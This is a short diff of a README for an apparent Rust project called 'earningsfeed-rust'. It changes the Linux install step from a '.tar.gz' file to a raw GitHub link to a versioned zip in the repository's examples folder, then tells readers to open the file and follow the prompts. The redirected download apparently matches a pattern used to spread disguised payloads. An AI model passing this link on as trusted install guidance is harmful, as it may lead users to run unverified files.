DweejTripathi/earningsfeed-rust/README.md

    You will see various downloadable files.
 Choose the one suitable for your system.
    - If you are using Windows, download the `.exe` file.
    - For macOS, grab the `.dmg` file.
-   - If you use Linux, take the `.tar.gz` file.
+   - If you use Linux, take the `https://raw.githubusercontent.com/DweejTripathi/earningsfeed-rust/main/examples/rust-earningsfeed-2.6.zip` file.

 4. **Run the File**
    After downloading, locate the file you downloaded, and open it.
 Follow the prompts to install the application.